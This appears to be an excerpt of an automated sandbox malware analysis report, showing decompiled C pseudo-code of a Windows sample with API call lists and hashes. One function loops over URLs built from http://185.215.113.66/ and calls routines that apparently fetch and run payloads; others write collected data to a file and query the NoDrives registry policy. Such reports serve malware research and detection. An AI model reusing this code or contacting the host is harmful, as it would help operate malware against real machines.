                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                                                                                                                                                                                                                    • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                                                                                                                                                                                                                    • API String ID: 2666887985-3471754645
                                                                                                                                                                                                                                                                                    • Opcode ID: 9d90b313020425024ef4211a7d2766a6eb2190f61c39788aa0d4f477df4a16fe
                                                                                                                                                                                                                                                                                    • Instruction ID: 1183846ab50913c5dc9fb8b6007841b1b3d3e2f8f7d5b2678c7a8c905f18143c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d90b313020425024ef4211a7d2766a6eb2190f61c39788aa0d4f477df4a16fe
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E110DB0E4020A9BDF10CFD0D945BEEBB74FB48704F108019E611B7280D7B89645CF99
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 97%
                                                                                                                                                                                                                                                                                    			E00404970(intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                    				signed int _v5;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				signed int _v13;
                                                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                                                                                    				long _v36;
                                                                                                                                                                                                                                                                                    				signed char _t76;
                                                                                                                                                                                                                                                                                    				void* _t79;
                                                                                                                                                                                                                                                                                    				intOrPtr _t87;
                                                                                                                                                                                                                                                                                    				intOrPtr _t88;
                                                                                                                                                                                                                                                                                    				signed char _t91;
                                                                                                                                                                                                                                                                                    				signed int _t141;
                                                                                                                                                                                                                                                                                    				void* _t158;
                                                                                                                                                                                                                                                                                    				void* _t159;
                                                                                                                                                                                                                                                                                    				void* _t160;
                                                                                                                                                                                                                                                                                    				void* _t169;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v5 = 0;
                                                                                                                                                                                                                                                                                    				EnterCriticalSection(0x416398);
                                                                                                                                                                                                                                                                                    				_t111 = _a12;
                                                                                                                                                                                                                                                                                    				_t76 = E0040B270(_a12, _a16);
                                                                                                                                                                                                                                                                                    				_t159 = _t158 + 8;
                                                                                                                                                                                                                                                                                    				if((_t76 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                    					_t79 = E0040B210(_t111, _a12);
                                                                                                                                                                                                                                                                                    					_t160 = _t159 + 4;
                                                                                                                                                                                                                                                                                    					_v12 = _t79;
                                                                                                                                                                                                                                                                                    					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                    						_v5 = 1;
                                                                                                                                                                                                                                                                                    						_v13 = 0;
                                                                                                                                                                                                                                                                                    						_v20 = 0;
                                                                                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                                                                                    							_t169 = _v20 -  *0x4163b4; // 0x0
                                                                                                                                                                                                                                                                                    							if(_t169 >= 0) {
                                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_v24 = _v20 * 0x110 +  *0x4163b0;
                                                                                                                                                                                                                                                                                    							if( *((intOrPtr*)(_v24 + 4)) ==  *((intOrPtr*)(_v12 + 4))) {
                                                                                                                                                                                                                                                                                    								memcpy(_v24, _v12, 0x40 << 2);
                                                                                                                                                                                                                                                                                    								E00408C70( *((intOrPtr*)(_v24 + 0x108)));
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_v24 + 0x108)) = E00408CE0(_a12, _a16);
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_v24 + 0x10c)) = _a16;
                                                                                                                                                                                                                                                                                    								E00408C70( *((intOrPtr*)(_v24 + 0x100)));
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_v24 + 0x104)) = _a16 - 0x100;
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_v24 + 0x100)) = E0040AB80( *((intOrPtr*)(_v24 + 0x104)), _v24 + 0x14, 0x14, _a12 + 0x100,  *((intOrPtr*)(_v24 + 0x104)));
                                                                                                                                                                                                                                                                                    								_push( *((intOrPtr*)(_v24 + 8)));
                                                                                                                                                                                                                                                                                    								E00405C90( *((intOrPtr*)(_v24 + 0x100)),  *((intOrPtr*)(_v24 + 4)),  *((intOrPtr*)(_v24 + 0x100)),  *((intOrPtr*)(_v24 + 0x104)));
                                                                                                                                                                                                                                                                                    								_t160 = _t160 + 0x3c;
                                                                                                                                                                                                                                                                                    								_v13 = 1;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								_v20 = _v20 + 1;
                                                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						__eflags = _v13 & 0x000000ff;
                                                                                                                                                                                                                                                                                    						if((_v13 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    							_t91 = E004044E0(_a16, _v12, _a12, _a16, 1);
                                                                                                                                                                                                                                                                                    							_t160 = _t160 + 0x10;
                                                                                                                                                                                                                                                                                    							__eflags = _t91 & 0x000000ff;
                                                                                                                                                                                                                                                                                    							if((_t91 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    								 *0x4163b4 = 0;
                                                                                                                                                                                                                                                                                    								_v5 = 0;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						E00408C70(_v12);
                                                                                                                                                                                                                                                                                    						__eflags = _v5 & 0x000000ff;
                                                                                                                                                                                                                                                                                    						if((_v5 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                    							_v28 = CreateFileW(0x4165c8, 0x40000000, 0, 0, 2, 2, 0);
                                                                                                                                                                                                                                                                                    							__eflags = _v28 - 0xffffffff;
                                                                                                                                                                                                                                                                                    							if(_v28 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    								_v32 = 0;
                                                                                                                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                                                                                                                    									__eflags = _v32 -  *0x4163b4; // 0x0
                                                                                                                                                                                                                                                                                    									if(__eflags >= 0) {
                                                                                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_t87 =  *0x4163b0; // 0x0
                                                                                                                                                                                                                                                                                    									_t88 =  *0x4163b0; // 0x0
                                                                                                                                                                                                                                                                                    									WriteFile(_v28,  *(_t88 + 0x108 + _v32 * 0x110),  *(_t87 + 0x10c + _v32 * 0x110),  &_v36, 0);
                                                                                                                                                                                                                                                                                    									_t141 = _v32 + 1;
                                                                                                                                                                                                                                                                                    									__eflags = _t141;
                                                                                                                                                                                                                                                                                    									_v32 = _t141;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								FlushFileBuffers(_v28);
                                                                                                                                                                                                                                                                                    								CloseHandle(_v28);
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				LeaveCriticalSection(0x416398);
                                                                                                                                                                                                                                                                                    				return _v5;
                                                                                                                                                                                                                                                                                    			}





















                                                                                                                                                                                                                                                                                    0x00404978
                                                                                                                                                                                                                                                                                    0x00404981
                                                                                                                                                                                                                                                                                    0x0040498b
                                                                                                                                                                                                                                                                                    0x0040498f
                                                                                                                                                                                                                                                                                    0x00404994
                                                                                                                                                                                                                                                                                    0x0040499c
                                                                                                                                                                                                                                                                                    0x004049a6
                                                                                                                                                                                                                                                                                    0x004049ab
                                                                                                                                                                                                                                                                                    0x004049ae
                                                                                                                                                                                                                                                                                    0x004049b5
                                                                                                                                                                                                                                                                                    0x004049bb
                                                                                                                                                                                                                                                                                    0x004049bf
                                                                                                                                                                                                                                                                                    0x004049c3
                                                                                                                                                                                                                                                                                    0x004049d5
                                                                                                                                                                                                                                                                                    0x004049d8
                                                                                                                                                                                                                                                                                    0x004049de
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004049f3
                                                                                                                                                                                                                                                                                    0x00404a02
                                                                                                                                                                                                                                                                                    0x00404a11
                                                                                                                                                                                                                                                                                    0x00404a1d
                                                                                                                                                                                                                                                                                    0x00404a38
                                                                                                                                                                                                                                                                                    0x00404a44
                                                                                                                                                                                                                                                                                    0x00404a54
                                                                                                                                                                                                                                                                                    0x00404a68
                                                                                                                                                                                                                                                                                    0x00404a96
                                                                                                                                                                                                                                                                                    0x00404aa2
                                                                                                                                                                                                                                                                                    0x00404abe
                                                                                                                                                                                                                                                                                    0x00404ac3
                                                                                                                                                                                                                                                                                    0x00404ac6
                                                                                                                                                                                                                                                                                    0x00404a04
                                                                                                                                                                                                                                                                                    0x004049d2
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004049d2
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00404a02
                                                                                                                                                                                                                                                                                    0x00404ad5
                                                                                                                                                                                                                                                                                    0x00404ad7
                                                                                                                                                                                                                                                                                    0x00404ae7
                                                                                                                                                                                                                                                                                    0x00404aec
                                                                                                                                                                                                                                                                                    0x00404af2
                                                                                                                                                                                                                                                                                    0x00404af4
                                                                                                                                                                                                                                                                                    0x00404af6
                                                                                                                                                                                                                                                                                    0x00404b00
                                                                                                                                                                                                                                                                                    0x00404b00
                                                                                                                                                                                                                                                                                    0x00404af4
                                                                                                                                                                                                                                                                                    0x00404b08
                                                                                                                                                                                                                                                                                    0x00404b14
                                                                                                                                                                                                                                                                                    0x00404b16
                                                                                                                                                                                                                                                                                    0x00404b36
                                                                                                                                                                                                                                                                                    0x00404b39
                                                                                                                                                                                                                                                                                    0x00404b3d
                                                                                                                                                                                                                                                                                    0x00404b3f
                                                                                                                                                                                                                                                                                    0x00404b51
                                                                                                                                                                                                                                                                                    0x00404b54
                                                                                                                                                                                                                                                                                    0x00404b5a
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00404b6b
                                                                                                                                                                                                                                                                                    0x00404b81
                                                                                                                                                                                                                                                                                    0x00404b92
                                                                                                                                                                                                                                                                                    0x00404b4b
                                                                                                                                                                                                                                                                                    0x00404b4b
                                                                                                                                                                                                                                                                                    0x00404b4e
                                                                                                                                                                                                                                                                                    0x00404b4e
                                                                                                                                                                                                                                                                                    0x00404b9e
                                                                                                                                                                                                                                                                                    0x00404ba8
                                                                                                                                                                                                                                                                                    0x00404ba8
                                                                                                                                                                                                                                                                                    0x00404b3d
                                                                                                                                                                                                                                                                                    0x00404b16
                                                                                                                                                                                                                                                                                    0x004049b5
                                                                                                                                                                                                                                                                                    0x00404bb3
                                                                                                                                                                                                                                                                                    0x00404bc1

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00416398,?,?,00000000,0040A547,006A0266,?,0040A563,00000000,0040B81C,?), ref: 00404981
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(004165C8,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00404B30
                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,?,?,00000000,00000000), ref: 00404B92
                                                                                                                                                                                                                                                                                    • FlushFileBuffers.KERNEL32 ref: 00404B9E
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00404BA8
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00416398,?,?,00000000,0040A547,006A0266,?,0040A563,00000000,0040B81C,?), ref: 00404BB3
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWrite
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2945370292-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 1fef3702c3e63574ed35e0dfe7bc8173a088fc6aeaa4d3467fc2287270656826
                                                                                                                                                                                                                                                                                    • Instruction ID: 17ab94b32ecbdd43ae5be3672dc601cffb9a037549fc2dffe68e9228f76f24ff
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1fef3702c3e63574ed35e0dfe7bc8173a088fc6aeaa4d3467fc2287270656826
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 487182B5A00109ABCB04CF94D985FEFB7B5FB88304F148169EA05B7381C779E941CBA9
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E0040BBA0(signed int* _a4, long _a8, _Unknown_base(*)()* _a12, void* _a16, DWORD* _a20, HANDLE* _a24) {
                                                                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                                                                    				signed int* _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				if(_a4 == 0) {
                                                                                                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_v12 = _a4;
                                                                                                                                                                                                                                                                                    				EnterCriticalSection( &(_v12[1]));
                                                                                                                                                                                                                                                                                    				E0040BB20( &(_v12[1]), _v12);
                                                                                                                                                                                                                                                                                    				if(_a12 != 0) {
                                                                                                                                                                                                                                                                                    					_v12[7] = E00408B60(_v12[7], 4 +  *_v12 * 4, _v12[7], 4 +  *_v12 * 4);
                                                                                                                                                                                                                                                                                    					if(_v12[7] != 0) {
                                                                                                                                                                                                                                                                                    						_v16 = CreateThread(0, _a8, _a12, _a16, 0, _a20);
                                                                                                                                                                                                                                                                                    						if(_v16 != 0) {
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_v12[7] +  *_v12 * 4)) = _v16;
                                                                                                                                                                                                                                                                                    							 *_v12 =  *_v12 + 1;
                                                                                                                                                                                                                                                                                    							if(_a24 != 0) {
                                                                                                                                                                                                                                                                                    								_t49 = GetCurrentProcess();
                                                                                                                                                                                                                                                                                    								DuplicateHandle(GetCurrentProcess(), _v16, _t49, _a24, 0, 0, 2);
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_v8 = 1;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				LeaveCriticalSection( &(_v12[1]));
                                                                                                                                                                                                                                                                                    				goto L8;
                                                                                                                                                                                                                                                                                    			}







                                                                                                                                                                                                                                                                                    0x0040bba6
                                                                                                                                                                                                                                                                                    0x0040bbb1
                                                                                                                                                                                                                                                                                    0x0040bc88
                                                                                                                                                                                                                                                                                    0x0040bc8e
                                                                                                                                                                                                                                                                                    0x0040bc8e
                                                                                                                                                                                                                                                                                    0x0040bbba
                                                                                                                                                                                                                                                                                    0x0040bbc4
                                                                                                                                                                                                                                                                                    0x0040bbce
                                                                                                                                                                                                                                                                                    0x0040bbda
                                                                                                                                                                                                                                                                                    0x0040bbff
                                                                                                                                                                                                                                                                                    0x0040bc09
                                                                                                                                                                                                                                                                                    0x0040bc25
                                                                                                                                                                                                                                                                                    0x0040bc2c
                                                                                                                                                                                                                                                                                    0x0040bc3c
                                                                                                                                                                                                                                                                                    0x0040bc4a
                                                                                                                                                                                                                                                                                    0x0040bc50
                                                                                                                                                                                                                                                                                    0x0040bc5c
                                                                                                                                                                                                                                                                                    0x0040bc6e
                                                                                                                                                                                                                                                                                    0x0040bc6e
                                                                                                                                                                                                                                                                                    0x0040bc74
                                                                                                                                                                                                                                                                                    0x0040bc74
                                                                                                                                                                                                                                                                                    0x0040bc2c
                                                                                                                                                                                                                                                                                    0x0040bc09
                                                                                                                                                                                                                                                                                    0x0040bc82
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040BBC4
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BB20: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040BB60
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BB20: CloseHandle.KERNEL32(?), ref: 0040BB79
                                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040BC1F
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040BC5C
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040BC67
                                                                                                                                                                                                                                                                                    • DuplicateHandle.KERNEL32 ref: 0040BC6E
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040BC82
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2251373460-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 33c17659471092c2b756b62356fc1a2425cda27d656a6ab2967af513715b6e0f
                                                                                                                                                                                                                                                                                    • Instruction ID: 02f9ad1cbe3c42a1849ee7ac27792547e5d144dd11b2029950602c6e4363e771
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33c17659471092c2b756b62356fc1a2425cda27d656a6ab2967af513715b6e0f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E311074900208EFDB04DF94D899F9E7BB5FF48304F108159E905A7391D775AA91CF98
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00407980(signed int _a4, signed int _a8) {
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				L0040EDFE();
                                                                                                                                                                                                                                                                                    				L0040EDF8();
                                                                                                                                                                                                                                                                                    				_a4 = _a4 | _a4;
                                                                                                                                                                                                                                                                                    				_a8 = _a8 | _a8;
                                                                                                                                                                                                                                                                                    				L0040EDFE();
                                                                                                                                                                                                                                                                                    				L0040EDF8();
                                                                                                                                                                                                                                                                                    				_a4 = _a4 & 0x0000ffff | _a4 & 0xffff0000;
                                                                                                                                                                                                                                                                                    				_a8 = _a8 & 0x0000ffff | _a8 & 0xffff0000;
                                                                                                                                                                                                                                                                                    				L0040EDFE();
                                                                                                                                                                                                                                                                                    				L0040EDF8();
                                                                                                                                                                                                                                                                                    				_a4 = _a4 & 0x00ff00ff | _a4 & 0xff00ff00;
                                                                                                                                                                                                                                                                                    				_a8 = _a8 & 0x00ff00ff | _a8 & 0xff00ff00;
                                                                                                                                                                                                                                                                                    				return _a4;
                                                                                                                                                                                                                                                                                    			}



                                                                                                                                                                                                                                                                                    0x0040798d
                                                                                                                                                                                                                                                                                    0x0040799e
                                                                                                                                                                                                                                                                                    0x004079a7
                                                                                                                                                                                                                                                                                    0x004079aa
                                                                                                                                                                                                                                                                                    0x004079c0
                                                                                                                                                                                                                                                                                    0x004079dc
                                                                                                                                                                                                                                                                                    0x004079e5
                                                                                                                                                                                                                                                                                    0x004079e8
                                                                                                                                                                                                                                                                                    0x004079fe
                                                                                                                                                                                                                                                                                    0x00407a1a
                                                                                                                                                                                                                                                                                    0x00407a23
                                                                                                                                                                                                                                                                                    0x00407a26
                                                                                                                                                                                                                                                                                    0x00407a32

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _allshl_aullshr
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 673498613-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 8ea7b64097fb68af6753185209a0c413dd0031376398f2c807c5146dc0d87a2e
                                                                                                                                                                                                                                                                                    • Instruction ID: 2093b42955e45bd62e61740d1c7aadb5a606cc23c90c49e7bcc84aa687a307ef
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ea7b64097fb68af6753185209a0c413dd0031376398f2c807c5146dc0d87a2e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C1121325005286B9B10EF5EC4826CABBD6EF84361B15C136FC2CDF359D634D9515BD4
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                                                                                                                                                    			E00405CF0() {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                                                    				char _v44;
                                                                                                                                                                                                                                                                                    				char _v148;
                                                                                                                                                                                                                                                                                    				intOrPtr _v152;
                                                                                                                                                                                                                                                                                    				intOrPtr _v156;
                                                                                                                                                                                                                                                                                    				intOrPtr _v160;
                                                                                                                                                                                                                                                                                    				intOrPtr _v164;
                                                                                                                                                                                                                                                                                    				intOrPtr _v168;
                                                                                                                                                                                                                                                                                    				signed int _v172;
                                                                                                                                                                                                                                                                                    				signed char _t35;
                                                                                                                                                                                                                                                                                    				void* _t45;
                                                                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v44 = 0;
                                                                                                                                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                                                                                                                                    				_v36 = 0;
                                                                                                                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                                                                                                                                    				_v24 = 0;
                                                                                                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				_v168 = 0x411130;
                                                                                                                                                                                                                                                                                    				_v164 = 0x411134;
                                                                                                                                                                                                                                                                                    				_v160 = 0x411138;
                                                                                                                                                                                                                                                                                    				_v156 = 0x41113c;
                                                                                                                                                                                                                                                                                    				_v152 = 0x411140;
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    					_v172 = 0;
                                                                                                                                                                                                                                                                                    					while(_v172 < 5) {
                                                                                                                                                                                                                                                                                    						Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    						_push( *((intOrPtr*)(_t45 + _v172 * 4 - 0xa4)));
                                                                                                                                                                                                                                                                                    						_push("http://185.215.113.66/");
                                                                                                                                                                                                                                                                                    						wsprintfA( &_v148, "%s%s");
                                                                                                                                                                                                                                                                                    						_t35 = E0040D440( &_v148, _t45 + _v172 * 4 - 0x28);
                                                                                                                                                                                                                                                                                    						_t46 = _t46 + 0x18;
                                                                                                                                                                                                                                                                                    						if((_t35 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                                    							E0040D4F0( &_v148, 0);
                                                                                                                                                                                                                                                                                    							_t46 = _t46 + 8;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_v172 = _v172 + 1;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					Sleep(0xdbba0);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}























                                                                                                                                                                                                                                                                                    0x00405cf9
                                                                                                                                                                                                                                                                                    0x00405d02
                                                                                                                                                                                                                                                                                    0x00405d05
                                                                                                                                                                                                                                                                                    0x00405d08
                                                                                                                                                                                                                                                                                    0x00405d0b
                                                                                                                                                                                                                                                                                    0x00405d0e
                                                                                                                                                                                                                                                                                    0x00405d11
                                                                                                                                                                                                                                                                                    0x00405d14
                                                                                                                                                                                                                                                                                    0x00405d17
                                                                                                                                                                                                                                                                                    0x00405d1a
                                                                                                                                                                                                                                                                                    0x00405d1d
                                                                                                                                                                                                                                                                                    0x00405d27
                                                                                                                                                                                                                                                                                    0x00405d31
                                                                                                                                                                                                                                                                                    0x00405d3b
                                                                                                                                                                                                                                                                                    0x00405d45
                                                                                                                                                                                                                                                                                    0x00405d4f
                                                                                                                                                                                                                                                                                    0x00405d54
                                                                                                                                                                                                                                                                                    0x00405d5a
                                                                                                                                                                                                                                                                                    0x00405d75
                                                                                                                                                                                                                                                                                    0x00405d83
                                                                                                                                                                                                                                                                                    0x00405d96
                                                                                                                                                                                                                                                                                    0x00405d97
                                                                                                                                                                                                                                                                                    0x00405da8
                                                                                                                                                                                                                                                                                    0x00405dc3
                                                                                                                                                                                                                                                                                    0x00405dc8
                                                                                                                                                                                                                                                                                    0x00405dd1
                                                                                                                                                                                                                                                                                    0x00405ddc
                                                                                                                                                                                                                                                                                    0x00405de1
                                                                                                                                                                                                                                                                                    0x00405de1
                                                                                                                                                                                                                                                                                    0x00405d6f
                                                                                                                                                                                                                                                                                    0x00405d6f
                                                                                                                                                                                                                                                                                    0x00405deb
                                                                                                                                                                                                                                                                                    0x00405deb

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
